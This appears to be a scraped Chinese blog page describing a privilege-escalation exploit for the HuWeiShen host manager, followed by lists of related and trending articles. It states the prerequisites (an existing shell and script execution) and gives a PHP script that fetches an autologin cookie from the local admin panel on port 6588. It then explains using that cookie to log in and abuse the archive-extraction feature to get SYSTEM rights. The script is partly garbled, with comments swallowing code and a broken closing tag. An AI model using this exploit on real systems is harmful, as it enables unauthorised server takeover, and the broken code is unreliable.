利用条件:
1.有shell
2.有可执行脚本

<?php
function httpGet() {$url = 'http://127.0.0.1:6588/admin/index.asp?f=autologin';$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_HEADER, TRUE);    //表示需要response headercurl_setopt($ch, CURLOPT_NOBODY, TRUE); //表示需要response bodycurl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, FALSE);curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);curl_setopt($ch, CURLOPT_TIMEOUT, 120);$result = curl_exec($ch);return $result;
}
echo httpGet();
echo asd;
?

拿到的cookie拿去后台登陆 利用支持解压包 以护卫神的system权限达到提权的目的

护卫神6588端口提权相关推荐

  1. 护卫神mysql提权_护卫神主机大师提权漏洞利用分析

    *本文原创作者:Freedom,本文属FreeBuf原创奖励计划,未经许可禁止转载 0x01 前言 护卫神·主机大师支持一键安装网站运行环境(IIS+ASP+ASP.net+PHP5.2-5.6+My ...

  2. 护卫神mysql提权_【转载】提权纪实-突破护卫神目录权限

    一个dede的站shell,看了下 disable_functions exec,system,passthru,popen,pclose,shell_exec,proc_open,dl,chmod, ...

  3. 应用安全-提权/降权相关整理

    工具提权 https://github.com/SecWiki/linux-kernel-exploits 提权CVE https://github.com/nixawk/labs 操作系统提权-Wi ...

  4. 渗透学什么?渗透测试中超全的提权思路来了!

    雨笋小编又来分享渗透测试干货了,感兴趣的伙伴们惠存! 提权Webshell:尽量能够获取webshell,如果获取不到webshell可以在有文件上传的地方上传反弹shell脚本:或者利用漏洞(系统漏 ...

  5. MySQL提权总结与记录-UDF/MOF/启动项提权

    0x00 Mysql提权基础 Mysql提权主要是需要利用高权限的Mysql用户进行操作,拿用户主要是下列几种方式 注入 上传getshell 查看网站数据库配置信息拿到用户密码 弱口令 mysql系 ...

  6. 提权 --Windows提权方式总结

    文章目录 一.提权含义 二.环境搭建 2.1 环境一览 2.2 靶机环境搭建 三.信息收集 3.1前提条件 3.2 基本信息收集 3.2.1 判断操作系统 3.2.2 判别当前权限 3.2.3 其它信 ...

  7. 护卫神mysql提权_护卫神主机大师被提权漏洞利用(可千万不能乱装护卫神主机管理一键安装的软件)...

    "护卫神·主机大师支持一键安装网站运行环境(IIS+ASP+ASP.net+PHP5.2-5.6+MySQL+FTP+伪静态+PhpMyAdmin),并可在线开设主机.SQL Server和 ...

  8. 护卫神主机大师被提权漏洞利用(可千万不能乱装护卫神主机管理一键安装的软件)

    "护卫神·主机大师支持一键安装网站运行环境(IIS+ASP+ASP.net+PHP5.2-5.6+MySQL+FTP+伪静态+PhpMyAdmin),并可在线开设主机.SQL Server和 ...

  9. 护卫神主机大师被提权漏洞利用(可千万不能乱装护卫神主机管理一键安装的软件)...

    "护卫神·主机大师支持一键安装网站运行环境(IIS+ASP+ASP.net+PHP5.2-5.6+MySQL+FTP+伪静态+PhpMyAdmin),并可在线开设主机.SQL Server和 ...

最新文章

  1. linux postgres用户,关于linux:在启动时创建postgres用户
  2. QT的QDtls类的使用
  3. js计算器代码加减乘除_如何用jQuery做一个简易版计算器
  4. os.environ详解
  5. js数组去重,合集等操作
  6. python语句分号_python 为什么不用分号作终止符?
  7. 火眼公司发布公开漏洞奖励计划
  8. elasticsearch sort illegal_argument_exception error
  9. 【腾讯】结合蒸馏和多任务学习的召回模型
  10. 关于信息安全工作方法论的一点猜想
  11. 用51单片机和esp8266实现通过手机app控制单片机小灯
  12. 《逻辑:你认为正确,就一定正确吗?》
  13. android 使用流量监控,android流量监控
  14. 一家椰子鸡店,凭什么让客户去了一趟又一趟?到底有什么样的魔力?
  15. 使用浏览器访问或调试微信公众号(跳过微信认证)
  16. PS怎样扣图片和压缩图片工具推荐
  17. Elasticsearch简易入门讲解
  18. (AI)Illustrator 2020安装教程
  19. 列表, 元组, range() 知识总结
  20. 如何使用Leaflet加载QGIS切图工具生成的瓦片

热门文章

  1. 详解Wi-Fi连接上网认证接入的原理和过程
  2. 从零开始实现Dalsa线阵相机采图
  3. 为什么计算机编程全用英语,为什么所有编程都是英文的?为什么不能中文程序?...
  4. Python入门 判断用户输入的数是正数还是负数
  5. Day010要事第一
  6. AWS攻略——Peering连接VPC
  7. hdu3018解题报告--也是白话几笔画学习总结
  8. Tomcat 报异常org.apache.catalina.core.standardwrappervalve invoke
  9. Linux进程调用execve,关于linux:在C语言中使用execve loader时子进程如何终止
  10. 360手机官方刷机教程(N6系列+N7系列通用)